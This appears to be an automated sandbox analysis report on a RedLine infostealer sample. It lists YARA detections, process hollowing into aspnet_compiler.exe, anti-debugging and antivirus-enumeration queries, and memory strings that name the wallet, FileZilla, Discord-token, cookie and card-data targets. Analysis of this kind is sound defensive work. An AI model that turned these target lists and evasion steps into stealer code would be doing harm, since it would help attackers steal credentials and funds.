                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E446A8
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E40448
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E419D0
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E47321
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E45129
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E48108
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E40439
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E419C1
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E43F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_02E2DE10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_02E2D2F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0620E7D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06206400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_062015A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0620DF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06201AB8
                    Source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.322199547.0000000005010000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000000.307650279.00000000005D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321384668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.321334213.0000000002C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exeBinary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe
                    Source: StZAEFSb2j.exeReversingLabs: Detection: 34%
                    Source: StZAEFSb2j.exeVirustotal: Detection: 25%
                    Source: StZAEFSb2j.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\StZAEFSb2j.exe C:\Users\user\Desktop\StZAEFSb2j.exe
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StZAEFSb2j.exe.log
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA487.tmp
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/26@3/2
                    Source: tmpA487.tmp.1.dr, tmpE406.tmp.1.dr, tmpCF62.tmp.1.dr, tmpE3D6.tmp.1.dr, tmpE3B6.tmp.1.dr, tmpA4F5.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: StZAEFSb2j.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: StZAEFSb2j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: StZAEFSb2j.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: StZAEFSb2j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: XCBVNDDJD.pdb source: StZAEFSb2j.exe

                    Data Obfuscation

                    Source: StZAEFSb2j.exe, u206e????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u206e????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_06208010 push es; ret

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49700
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 5504Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 1236Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1276Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 9604
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E430E0 sldt word ptr [ecx]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477

                    Anti Debugging

                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E46310 CheckRemoteDebuggerPresent,
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41C000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E09008
                    Source: StZAEFSb2j.exe, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeQueries volume information: C:\Users\user\Desktop\StZAEFSb2j.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: aspnet_compiler.exe, 00000001.00000002.436889284.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Win32_Process.Handle="3124"oaming\Electrum\wallets\*
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: 